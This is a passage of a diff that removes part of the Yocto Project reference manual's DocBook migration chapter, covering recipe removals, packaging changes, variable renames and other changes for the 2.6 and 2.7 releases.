-                    <filename>LIVE_ROOTFS_TYPE = "squashfs-lz4"</filename>
-                    and ensure that <filename>live</filename>
-                    is in <filename>IMAGE_FSTYPES</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    Recipes with an unconditional dependency on
-                    <filename>libpam</filename> are only buildable with
-                    <filename>pam</filename> in
-                    <filename>DISTRO_FEATURES</filename>.
-                    If the dependency is truly optional then it is recommended
-                    that the dependency be conditional upon
-                    <filename>pam</filename> being in
-                    <filename>DISTRO_FEATURES</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    For EFI-based machines, the bootloader
-                    (<filename>grub-efi</filename> by default) is installed into
-                    the image at /boot.
-                    Wic can be used to split the bootloader into separate boot
-                    and rootfs partitions if necessary.
-                    </para></listitem>
-                <listitem><para>
-                    Patches whose context does not match exactly (i.e. where
-                    patch reports "fuzz" when applying) will generate a
-                    warning.
-                    For an example of this see
-                    <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?id=cc97bc08125b63821ce3f616771830f77c456f57'>this commit</ulink>.
-                    </para></listitem>
-                <listitem><para>
-                    Layers are expected to set
-                    <filename>LAYERSERIES_COMPAT_layername</filename>
-                    to match the version(s) of OpenEmbedded-Core they are
-                    compatible with.
-                    This is specified as codenames using spaces to separate
-                    multiple values (e.g. "rocko sumo").
-                    If a layer does not set
-                    <filename>LAYERSERIES_COMPAT_layername</filename>, a warning
-                    will is shown.
-                    If a layer sets a value that does not include the current
-                    version ("sumo" for the 2.5 release), then an error will be
-                    produced.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>TZ</filename> environment variable is set to
-                    "UTC" within the build environment in order to fix
-                    reproducibility problems in some recipes.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</section>
-
-<section id='moving-to-the-yocto-project-2.6-release'>
-    <title>Moving to the Yocto Project 2.6 Release</title>
-
-    <para>
-        This section provides migration information for moving to the
-        Yocto Project 2.6 Release from the prior release.
-    </para>
-
-    <section id='migration-2.6-gcc-changes'>
-        <title>GCC 8.2 is Now Used by Default</title>
-
-        <para>
-            The GNU Compiler Collection version 8.2 is now used by default
-            for compilation.
-            For more information on what has changed in the GCC 8.x release,
-            see
-            <ulink url='https://gcc.gnu.org/gcc-8/changes.html'></ulink>.
-        </para>
-
-        <para>
-            If you still need to compile with version 7.x, GCC 7.3 is
-            also provided.
-            You can select this version by setting the
-            and can be selected by setting the
-            <link linkend='var-GCCVERSION'><filename>GCCVERSION</filename></link>
-            variable to "7.%" in your configuration.
-        </para>
-    </section>
-
-    <section id='migration-2.6-removed-recipes'>
-        <title>Removed Recipes</title>
-
-        <para>
-            The following recipes have been removed:
-            <literallayout class='monospaced'>
-     <emphasis><filename>beecrypt</filename>:</emphasis> No longer needed since moving to RPM 4.
-     <emphasis><filename>bigreqsproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>calibrateproto</filename>:</emphasis> Removed in favor of <filename>xinput</filename>.
-     <emphasis><filename>compositeproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>damageproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>dmxproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>dri2proto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>dri3proto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>eee-acpi-scripts</filename>:</emphasis> Became obsolete.
-     <emphasis><filename>fixesproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>fontsproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>fstests</filename>:</emphasis> Became obsolete.
-     <emphasis><filename>gccmakedep</filename>:</emphasis> No longer used.
-     <emphasis><filename>glproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>gnome-desktop3</filename>:</emphasis> No longer needed.  This recipe has moved to <filename>meta-oe</filename>.
-     <emphasis><filename>icon-naming-utils</filename>:</emphasis> No longer used since the Sato theme was removed in 2016.
-     <emphasis><filename>inputproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>kbproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>libusb-compat</filename>:</emphasis> Became obsolete.
-     <emphasis><filename>libuser</filename>:</emphasis> Became obsolete.
-     <emphasis><filename>libnfsidmap</filename>:</emphasis> No longer an external requirement since <filename>nfs-utils</filename> 2.2.1.  <filename>libnfsidmap</filename> is now integrated.
-     <emphasis><filename>libxcalibrate</filename>:</emphasis> No longer needed with <filename>xinput</filename>
-     <emphasis><filename>mktemp</filename>:</emphasis> Became obsolete. The <filename>mktemp</filename> command is provided by both <filename>busybox</filename> and <filename>coreutils</filename>.
-     <emphasis><filename>ossp-uuid</filename>:</emphasis> Is not being maintained and has mostly been replaced by <filename>uuid.h</filename> in <filename>util-linux</filename>.
-     <emphasis><filename>pax-utils</filename>:</emphasis> No longer needed.  Previous QA tests that did use this recipe are now done at build time.
-     <emphasis><filename>pcmciautils</filename>:</emphasis> Became obsolete.
-     <emphasis><filename>pixz</filename>:</emphasis> No longer needed. <filename>xz</filename> now supports multi-threaded compression.
-     <emphasis><filename>presentproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>randrproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>recordproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>renderproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>resourceproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>scrnsaverproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>trace-cmd</filename>:</emphasis> Became obsolete.  <filename>perf</filename> replaced this recipe's functionally.
-     <emphasis><filename>videoproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>wireless-tools</filename>:</emphasis> Became obsolete.  Superseded by <filename>iw</filename>.
-     <emphasis><filename>xcmiscproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>xextproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>xf86dgaproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>xf86driproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>xf86miscproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>xf86-video-omapfb</filename>:</emphasis> Became obsolete.  Use kernel modesetting driver instead.
-     <emphasis><filename>xf86-video-omap</filename>:</emphasis> Became obsolete.  Use kernel modesetting driver instead.
-     <emphasis><filename>xf86vidmodeproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>xineramaproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>xproto</filename>:</emphasis> Replaced by <filename>xorgproto</filename>.
-     <emphasis><filename>yasm</filename>:</emphasis> No longer needed since previous usages are now satisfied by <filename>nasm</filename>.
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='migration-2.6-packaging-changes'>
-        <title>Packaging Changes</title>
-
-        <para>
-            The following packaging changes have been made:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis><filename>cmake</filename>:</emphasis>
-                    <filename>cmake.m4</filename> and
-                    <filename>toolchain</filename> files have been moved to the
-                    main package.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>iptables</filename>:</emphasis>
-                    The <filename>iptables</filename> modules have been split
-                    into separate packages.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>alsa-lib</filename>:</emphasis>
-                    <filename>libasound</filename> is now in the main
-                    <filename>alsa-lib</filename> package instead of
-                    <filename>libasound</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>glibc</filename>:</emphasis>
-                    <filename>libnss-db</filename> is now in its own package
-                    along with a <filename>/var/db/makedbs.sh</filename>
-                    script to update databases.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>python</filename> and <filename>python3</filename>:</emphasis>
-                    The main package has been removed from the recipe.
-                    You must install specific packages or
-                    <filename>python-modules</filename> /
-                    <filename>python3-modules</filename> for everything.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis><filename>systemtap</filename>:</emphasis>
-                    Moved <filename>systemtap-exporter</filename> into its own
-                    package.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.6-xorg-protocol-dependencies'>
-        <title>XOrg Protocol dependencies</title>
-
-        <para>
-            The "*proto" upstream repositories have been combined into one
-            "xorgproto" repository.
-            Thus, the corresponding recipes have also been combined into a
-            single <filename>xorgproto</filename> recipe.
-            Any recipes that depend upon the older <filename>*proto</filename>
-            recipes need to be changed to depend on the newer
-            <filename>xorgproto</filename> recipe instead.
-        </para>
-
-        <para>
-            For names of recipes removed because of this repository change,
-            see the
-            <link linkend="migration-2.6-removed-recipes">Removed Recipes</link>
-            section.
-        </para>
-    </section>
-
-    <section id='migration-2.6-distutils-distutils3-fetching-dependencies'>
-        <title><filename>distutils</filename> and <filename>distutils3</filename> Now Prevent Fetching Dependencies During the <filename>do_configure</filename> Task</title>
-
-        <para>
-            Previously, it was possible for Python recipes that inherited
-            the
-            <link linkend='ref-classes-distutils'><filename>distutils</filename></link>
-            and
-            <link linkend='ref-classes-distutils3'><filename>distutils3</filename></link>
-            classes to fetch code during the
-            <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
-            task to satisfy dependencies mentioned in
-            <filename>setup.py</filename> if those dependencies were not
-            provided in the sysroot (i.e. recipes providing the dependencies
-            were missing from
-            <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>).
-            <note>
-                This change affects classes beyond just the two mentioned
-                (i.e. <filename>distutils</filename> and
-                <filename>distutils3</filename>).
-                Any recipe that inherits <filename>distutils*</filename>
-                classes are affected.
-                For example, the <filename>setuptools</filename> and
-                <filename>setuptools3</filename> recipes are affected since
-                they inherit the <filename>distutils*</filename> classes.
-            </note>
-        </para>
-
-        <para>
-            Fetching these types of dependencies that are not provided in the
-            sysroot negatively affects the ability to reproduce builds.
-            This type of fetching is now explicitly disabled.
-            Consequently, any missing dependencies in Python recipes that
-            use these classes now result in an error during the
-            <filename>do_configure</filename> task.
-        </para>
-    </section>
-
-    <section id='migration-2.6-linux-yocto-configuration-audit-issues-now-correctly-reported'>
-        <title><filename>linux-yocto</filename> Configuration Audit Issues Now Correctly Reported</title>
-
-        <para>
-            Due to a bug, the kernel configuration audit functionality was
-            not writing out any resulting warnings during the build.
-            This issue is now corrected.
-            You might notice these warnings now if you have a custom kernel
-            configuration with a <filename>linux-yocto</filename> style
-            kernel recipe.
-        </para>
-    </section>
-
-    <section id='migration-2.6-image-kernel-artifact-naming-changes'>
-        <title>Image/Kernel Artifact Naming Changes</title>
-
-        <para>
-            The following changes have been made:
-            <itemizedlist>
-                <listitem><para>
-                    Name variables (e.g.
-                    <link linkend='var-IMAGE_NAME'><filename>IMAGE_NAME</filename></link>)
-                    use a new <filename>IMAGE_VERSION_SUFFIX</filename>
-                    variable instead of
-                    <link linkend='var-DATETIME'><filename>DATETIME</filename></link>.
-                    Using <filename>IMAGE_VERSION_SUFFIX</filename> allows
-                    easier and more direct changes.</para>
-
-                    <para>The <filename>IMAGE_VERSION_SUFFIX</filename>
-                    variable is set in the
-                    <filename>bitbake.conf</filename> configuration file as
-                    follows:
-                    <literallayout class='monospaced'>
-     IMAGE_VERSION_SUFFIX = "-${DATETIME}"
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    Several variables have changed names for consistency:
-                    <literallayout class='monospaced'>
-    Old Variable Name               New Variable Name
-    ========================================================
-    KERNEL_IMAGE_BASE_NAME          <link linkend='var-KERNEL_IMAGE_NAME'>KERNEL_IMAGE_NAME</link>
-    KERNEL_IMAGE_SYMLINK_NAME       <link linkend='var-KERNEL_IMAGE_LINK_NAME'>KERNEL_IMAGE_LINK_NAME</link>
-    MODULE_TARBALL_BASE_NAME        <link linkend='var-MODULE_TARBALL_NAME'>MODULE_TARBALL_NAME</link>
-    MODULE_TARBALL_SYMLINK_NAME     <link linkend='var-MODULE_TARBALL_LINK_NAME'>MODULE_TARBALL_LINK_NAME</link>
-    INITRAMFS_BASE_NAME             <link linkend='var-INITRAMFS_NAME'>INITRAMFS_NAME</link>
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>MODULE_IMAGE_BASE_NAME</filename> variable
-                    has been removed.
-                    The module tarball name is now controlled directly with the
-                    <link linkend='var-MODULE_TARBALL_NAME'><filename>MODULE_TARBALL_NAME</filename></link>
-                    variable.
-                    </para></listitem>
-                <listitem><para>
-                    The
-                    <link linkend='var-KERNEL_DTB_NAME'><filename>KERNEL_DTB_NAME</filename></link>
-                    and
-                    <link linkend='var-KERNEL_DTB_LINK_NAME'><filename>KERNEL_DTB_LINK_NAME</filename></link>
-                    variables have been introduced to control kernel Device
-                    Tree Binary (DTB) artifact names instead of mangling
-                    <filename>KERNEL_IMAGE_*</filename> variables.
-                    </para></listitem>
-                <listitem><para>
-                    The
-                    <link linkend='var-KERNEL_FIT_NAME'><filename>KERNEL_FIT_NAME</filename></link>
-                    and
-                    <link linkend='var-KERNEL_FIT_LINK_NAME'><filename>KERNEL_FIT_LINK_NAME</filename></link>
-                    variables have been introduced to specify the name of
-                    flattened image tree (FIT) kernel images similar to other
-                    deployed artifacts.
-                    </para></listitem>
-                <listitem><para>
-                    The
-                    <link linkend='var-MODULE_TARBALL_NAME'><filename>MODULE_TARBALL_NAME</filename></link>
-                    and
-                    <link linkend='var-MODULE_TARBALL_LINK_NAME'><filename>MODULE_TARBALL_LINK_NAME</filename></link>
-                    variable values no longer include the "module-" prefix or
-                    ".tgz" suffix.
-                    These parts are now hardcoded so that the values are
-                    consistent with other artifact naming variables.
-                    </para></listitem>
-                <listitem><para>
-                    Added the
-                    <link linkend='var-INITRAMFS_LINK_NAME'><filename>INITRAMFS_LINK_NAME</filename></link>
-                    variable so that the symlink can be controlled similarly
-                    to other artifact types.
-                    </para></listitem>
-                <listitem><para>
-                    <link linkend='var-INITRAMFS_NAME'><filename>INITRAMFS_NAME</filename></link>
-                    now uses
-                    "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
-                    instead of
-                    "${PV}-${PR}-${MACHINE}-${DATETIME}", which
-                    makes it consistent with other variables.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.6-serial-console-deprecated'>
-        <title><filename>SERIAL_CONSOLE</filename> Deprecated</title>
-
-        <para>
-            The
-            <link linkend='var-SERIAL_CONSOLE'><filename>SERIAL_CONSOLE</filename></link>
-            variable has been functionally replaced by the
-            <link linkend='var-SERIAL_CONSOLES'><filename>SERIAL_CONSOLES</filename></link>
-            variable for some time.
-            With the Yocto Project 2.6 release,
-            <filename>SERIAL_CONSOLE</filename> has been officially deprecated.
-        </para>
-
-        <para>
-            <filename>SERIAL_CONSOLE</filename> will continue to work as
-            before for the 2.6 release.
-            However, for the sake of future compatibility, it is recommended
-            that you replace all instances of
-            <filename>SERIAL_CONSOLE</filename> with
-            <filename>SERIAL_CONSOLES</filename>.
-            <note>
-                The only difference in usage is that
-                <filename>SERIAL_CONSOLES</filename> expects entries to be
-                separated using semicolons as compared to
-                <filename>SERIAL_CONSOLE</filename>, which expects spaces.
-            </note>
-        </para>
-    </section>
-
-    <section id='migration-2.6-poky-sets-unknown-configure-option-to-qa-error'>
-        <title>Configure Script Reports Unknown Options as Errors</title>
-
-        <para>
-            If the configure script reports an unknown option, this now
-            triggers a QA error instead of a warning.
-            Any recipes that previously got away with specifying such unknown
-            options now need to be fixed.
-        </para>
-    </section>
-
-    <section id='migration-2.6-override-changes'>
-        <title>Override Changes</title>
-
-        <para>
-            The following changes have occurred:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis>The <filename>virtclass-native</filename> and
-                    <filename>virtclass-nativesdk</filename> Overrides Have
-                    Been Removed:</emphasis>
-                    The <filename>virtclass-native</filename> and
-                    <filename>virtclass-nativesdk</filename> overrides have
-                    been deprecated since 2012 in favor of
-                    <filename>class-native</filename> and
-                    <filename>class-nativesdk</filename>, respectively.
-                    Both <filename>virtclass-native</filename> and
-                    <filename>virtclass-nativesdk</filename> are now dropped.
-                    <note>
-                        The <filename>virtclass-multilib-</filename> overrides
-                        for multilib are still valid.
-                    </note>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>The <filename>forcevariable</filename>
-                    Override Now Has a Higher Priority Than
-                    <filename>libc</filename> Overrides:</emphasis>
-                    The <filename>forcevariable</filename> override is
-                    documented to be the highest priority override.
-                    However, due to a long-standing quirk of how
-                    <link linkend='var-OVERRIDES'><filename>OVERRIDES</filename></link>
-                    is set, the <filename>libc</filename> overrides (e.g.
-                    <filename>libc-glibc</filename>,
-                    <filename>libc-musl</filename>, and so forth) erroneously
-                    had a higher priority.
-                    This issue is now corrected.</para>
-
-                    <para>It is likely this change will not cause any
-                    problems.
-                    However, it is possible with some unusual configurations
-                    that you might see a change in behavior if you were
-                    relying on the previous behavior.
-                    Be sure to check how you use
-                    <filename>forcevariable</filename> and
-                    <filename>libc-*</filename> overrides in your custom
-                    layers and configuration files to ensure they make sense.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>The <filename>build-${BUILD_OS}</filename>
-                    Override Has Been Removed:</emphasis>
-                    The <filename>build-${BUILD_OS}</filename>, which is
-                    typically <filename>build-linux</filename>, override has
-                    been removed because building on a host operating system
-                    other than a recent version of Linux is neither supported
-                    nor recommended.
-                    Dropping the override avoids giving the impression that
-                    other host operating systems might be supported.
-                    </para></listitem>
-                <listitem><para>
-                    The "_remove" operator now preserves whitespace.
-                    Consequently, when specifying list items to remove, be
-                    aware that leading and trailing whitespace resulting from
-                    the removal is retained.</para>
-
-                    <para>See the
-                    "<ulink url='&YOCTO_DOCS_BB_URL;#removing-override-style-syntax'>Removal (Override Style Syntax)</ulink>"
-                    section in the BitBake User Manual for a detailed example.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.6-systemd-configuration-now-split-out-to-system-conf'>
-        <title><filename>systemd</filename> Configuration is Now Split Into <filename>systemd-conf</filename></title>
-
-        <para>
-            The configuration for the <filename>systemd</filename> recipe
-            has been moved into a <filename>system-conf</filename> recipe.
-            Moving this configuration to a separate recipe avoids the
-            <filename>systemd</filename> recipe from becoming machine-specific
-            for cases where machine-specific configurations need to be applied
-            (e.g. for <filename>qemu*</filename> machines).
-        </para>
-
-        <para>
-            Currently, the new recipe packages the following files:
-            <literallayout class='monospaced'>
-     ${sysconfdir}/machine-id
-     ${sysconfdir}/systemd/coredump.conf
-     ${sysconfdir}/systemd/journald.conf
-     ${sysconfdir}/systemd/logind.conf
-     ${sysconfdir}/systemd/system.conf
-     ${sysconfdir}/systemd/user.conf
-            </literallayout>
-            If you previously used bbappend files to append the
-            <filename>systemd</filename> recipe to change any of the
-            listed files, you must do so for the
-            <filename>systemd-conf</filename> recipe instead.
-        </para>
-    </section>
-
-    <section id='migration-2.6-automatic-testing-changes'>
-        <title>Automatic Testing Changes</title>
-
-        <para>
-            This section provides information about automatic testing
-            changes:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis><filename>TEST_IMAGE</filename> Variable Removed:</emphasis>
-                    Prior to this release, you set the
-                    <filename>TEST_IMAGE</filename> variable to "1" to
-                    enable automatic testing for successfully built images.
-                    The <filename>TEST_IMAGE</filename> variable no longer
-                    exists and has been replaced by the
-                    <link linkend='var-TESTIMAGE_AUTO'><filename>TESTIMAGE_AUTO</filename></link>
-                    variable.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Inheriting the <filename>testimage</filename> and
-                    <filename>testsdk</filename> Classes:</emphasis>
-                    Best practices now dictate that you use the
-                    <link linkend='var-IMAGE_CLASSES'><filename>IMAGE_CLASSES</filename></link>
-                    variable rather than the
-                    <link linkend='var-INHERIT'><filename>INHERIT</filename></link>
-                    variable when you inherit the
-                    <link linkend='ref-classes-testimage*'><filename>testimage</filename></link>
-                    and
-                    <link linkend='ref-classes-testsdk'><filename>testsdk</filename></link>
-                    classes used for automatic testing.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.6-openssl-changes'>
-        <title>OpenSSL Changes</title>
-
-        <para>
-            <ulink url='https://www.openssl.org/'>OpenSSL</ulink> has been
-            upgraded from 1.0 to 1.1.
-            By default, this upgrade could cause problems for recipes that
-            have both versions in their dependency chains.
-            The problem is that both versions cannot be installed together
-            at build time.
-            <note>
-                It is possible to have both versions of the library at runtime.
-            </note>
-        </para>
-    </section>
-
-    <section id='migration-2.6-bitbake-changes'>
-        <title>BitBake Changes</title>
-
-        <para>
-            The server logfile <filename>bitbake-cookerdaemon.log</filename> is
-            now always placed in the
-            <link linkend='build-directory'>Build Directory</link>
-            instead of the current directory.
-        </para>
-    </section>
-
-    <section id='migration-2.6-security-changes'>
-        <title>Security Changes</title>
-
-        <para>
-            The Poky distribution now uses security compiler flags by
-            default.
-            Inclusion of these flags could cause new failures due to stricter
-            checking for various potential security issues in code.
-        </para>
-    </section>
-
-    <section id='migration-2.6-post-installation-changes'>
-        <title>Post Installation Changes</title>
-
-        <para>
-            You must explicitly mark post installs to defer to the target.
-            If you want to explicitly defer a postinstall to first boot on
-            the target rather than at rootfs creation time, use
-            <filename>pkg_postinst_ontarget()</filename> or call
-            <filename>postinst_intercept delay_to_first_boot</filename> from
-            <filename>pkg_postinst()</filename>.
-            Any failure of a <filename>pkg_postinst()</filename> script
-            (including exit 1) triggers an error during the
-            <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link> task.
-        </para>
-
-        <para>
-            For more information on post-installation behavior, see the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#new-recipe-post-installation-scripts'>Post-Installation Scripts</ulink>"
-            section in the Yocto Project Development Tasks Manual.
-        </para>
-    </section>
-
-    <section id='migration-2.6-python-3-profile-guided-optimizations'>
-        <title>Python 3 Profile-Guided Optimization</title>
-
-        <para>
-            The <filename>python3</filename> recipe now enables profile-guided
-            optimization.
-            Using this optimization requires a little extra build time in
-            exchange for improved performance on the target at runtime.
-            Additionally, the optimization is only enabled if the current
-            <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
-            has support for user-mode emulation in QEMU (i.e. "qemu-usermode"
-            is in
-            <link linkend='var-MACHINE_FEATURES'><filename>MACHINE_FEATURES</filename></link>,
-            which it is by default).
-        </para>
-
-        <para>
-            If you wish to disable Python profile-guided optimization
-            regardless of the value of
-            <filename>MACHINE_FEATURES</filename>, then ensure that
-            <link linkend='var-PACKAGECONFIG'><filename>PACKAGECONFIG</filename></link>
-            for the <filename>python3</filename> recipe does not contain "pgo".
-            You could accomplish the latter using the following at the
-            configuration level:
-            <literallayout class='monospaced'>
-     PACKAGECONFIG_remove_pn-python3 = "pgo"
-            </literallayout>
-            Alternatively, you can set
-            <filename>PACKAGECONFIG</filename> using an append file for the
-            <filename>python3</filename> recipe.
-        </para>
-    </section>
-
-    <section id='migration-2.6-miscellaneous-changes'>
-        <title>Miscellaneous Changes</title>
-
-        <para>
-            The following miscellaneous changes occurred:
-            <itemizedlist>
-                <listitem><para>
-                    Default to using the Thumb-2 instruction set for armv7a
-                    and above.
-                    If you have any custom recipes that build software that
-                    needs to be built with the ARM instruction set, change the
-                    recipe to set the instruction set as follows:
-                    <literallayout class='monospaced'>
-     ARM_INSTRUCTION_SET = "arm"
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <filename>run-postinsts</filename> no longer uses
-                    <filename>/etc/*-postinsts</filename> for
-                    <filename>dpkg/opkg</filename> in favor of built-in
-                    postinst support.
-                    RPM behavior remains unchanged.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>NOISO</filename> and
-                    <filename>NOHDD</filename> variables are no longer used.
-                    You now control building <filename>*.iso</filename> and
-                    <filename>*.hddimg</filename> image types directly
-                    by using the
-                    <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
-                    variable.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>scripts/contrib/mkefidisk.sh</filename>
-                    has been removed in favor of Wic.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>kernel-modules</filename> has been removed from
-                    <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>
-                    for <filename>qemumips</filename> and
-                    <filename>qemumips64</filename> machines.
-                    Removal also impacts the <filename>x86-base.inc</filename>
-                    file.
-                    <note>
-                        <filename>genericx86</filename> and
-                        <filename>genericx86-64</filename> retain
-                        <filename>kernel-modules</filename> as part of the
-                        <filename>RRECOMMENDS</filename> variable setting.
-                    </note>
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>LGPLv2_WHITELIST_GPL-3.0</filename>
-                    variable has been removed.
-                    If you are setting this variable in your configuration,
-                    set or append it to the
-                    <filename>WHITELIST_GPL-3.0</filename> variable instead.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>${ASNEEDED}</filename> is now included in
-                    the
-                    <link linkend='var-TARGET_LDFLAGS'><filename>TARGET_LDFLAGS</filename></link>
-                    variable directly.
-                    The remaining definitions from
-                    <filename>meta/conf/distro/include/as-needed.inc</filename>
-                    have been moved to corresponding recipes.
-                    </para></listitem>
-                <listitem><para>
-                    Support for DSA host keys has been dropped from the
-                    OpenSSH recipes.
-                    If you are still using DSA keys, you must switch over to a
-                    more secure algorithm as recommended by OpenSSH upstream.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>dhcp</filename> recipe now uses the
-                    <filename>dhcpd6.conf</filename> configuration file in
-                    <filename>dhcpd6.service</filename> for IPv6 DHCP rather
-                    than re-using <filename>dhcpd.conf</filename>, which is
-                    now reserved for IPv4.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</section>
-
-<section id='moving-to-the-yocto-project-2.7-release'>
-    <title>Moving to the Yocto Project 2.7 Release</title>
-
-    <para>
-        This section provides migration information for moving to the
-        Yocto Project 2.7 Release from the prior release.
-    </para>
-
-    <section id='migration-2.7-bitbake-changes'>
-        <title>BitBake Changes</title>
-
-        <para>
-            The following changes have been made to BitBake:
-            <itemizedlist>
-                <listitem><para>
-                    BitBake now checks anonymous Python functions and pure
-                    Python functions (e.g. <filename>def funcname:</filename>)
-                    in the metadata for tab indentation.
-                    If found, BitBake  produces a warning.
-                    </para></listitem>
-                <listitem><para>
-                    Bitbake now checks
-                    <link linkend='var-BBFILE_COLLECTIONS'><filename>BBFILE_COLLECTIONS</filename></link>
-                    for duplicate entries and triggers an error if any are
-                    found.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-2.7-eclipse-support-dropped'>
-        <title><trademark class='trade'>Eclipse</trademark> Support Removed</title>
-
-        <para>
-            Support for the Eclipse IDE has been removed.
-            Support continues for those releases prior to 2.7 that did include
-            support.
-            The 2.7 release does not include the Eclipse Yocto plugin.
-        </para>
-    </section>
-
-    <section id='migration-2.7-qemu-native-splits-system-and-user-mode-parts'>
-        <title><filename>qemu-native</filename> Splits the System and User-Mode Parts</title>
-
-        <para>
-            The system and user-mode parts of <filename>qemu-native</filename>
-            are now split.
-            <filename>qemu-native</filename> provides the user-mode components
-            and <filename>qemu-system-native</filename> provides the system
-            components.
-            If you have recipes that depend on QEMU's system emulation
-            functionality at build time, they should now depend upon
-            <filename>qemu-system-native</filename> instead of
-            <filename>qemu-native</filename>.
-        </para>
-    </section>
-
-    <section id='migration-2.7-upstream-tracking.inc-removed'>
-        <title>The <filename>upstream-tracking.inc</filename> File Has Been Removed</title>
-
-        <para>
-            The previously deprecated <filename>upstream-tracking.inc</filename>
-            file is now removed.
-            Any <filename>UPSTREAM_TRACKING*</filename> variables are now set
-            in the corresponding recipes instead.
-        </para>
-
-        <para>
-            Remove any references you have to the
-            <filename>upstream-tracking.inc</filename> file in your
-            configuration.
-        </para>
-    </section>
-
-    <section id='migration-2.7-distro-features-libc-removed'>
-        <title>The <filename>DISTRO_FEATURES_LIBC</filename> Variable Has Been Removed</title>
-
-        <para>
-            The <filename>DISTRO_FEATURES_LIBC</filename> variable is no
-            longer used.
-            The ability to configure glibc using kconfig has been removed
-            for quite some time making the <filename>libc-*</filename> features
-            set no longer effective.
-        </para>
-
-        <para>
-            Remove any references you have to
-            <filename>DISTRO_FEATURES_LIBC</filename> in your own layers.
-        </para>
-    </section>
-
-    <section id='migration-2.7-license-values'>
-        <title>License Value Corrections</title>
-
-        <para>
-            The following corrections have been made to the
-            <link linkend='var-LICENSE'><filename>LICENSE</filename></link>
-            values set by recipes:
-            <literallayout class='monospaced'>
-     <emphasis>socat</emphasis>: Corrected <filename>LICENSE</filename> to be "GPLv2" rather than
-        "GPLv2+".
-
-     <emphasis>libgfortran</emphasis>: Set license to "GPL-3.0-with-GCC-exception".
-
-     <emphasis>elfutils</emphasis>: Removed "Elfutils-Exception" and set to "GPLv2" for shared
-        libraries
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='migration-2.7-packaging-changes'>
-        <title>Packaging Changes</title>
-
-        <para>
-            This section provides information about packaging changes.
-            <itemizedlist>
-                <listitem><para>
-                    <filename>bind</filename>: The
-                    <filename>nsupdate</filename> binary has been moved to
-                    the <filename>bind-utils</filename> package.
-                    </para></listitem>
-                <listitem><para>
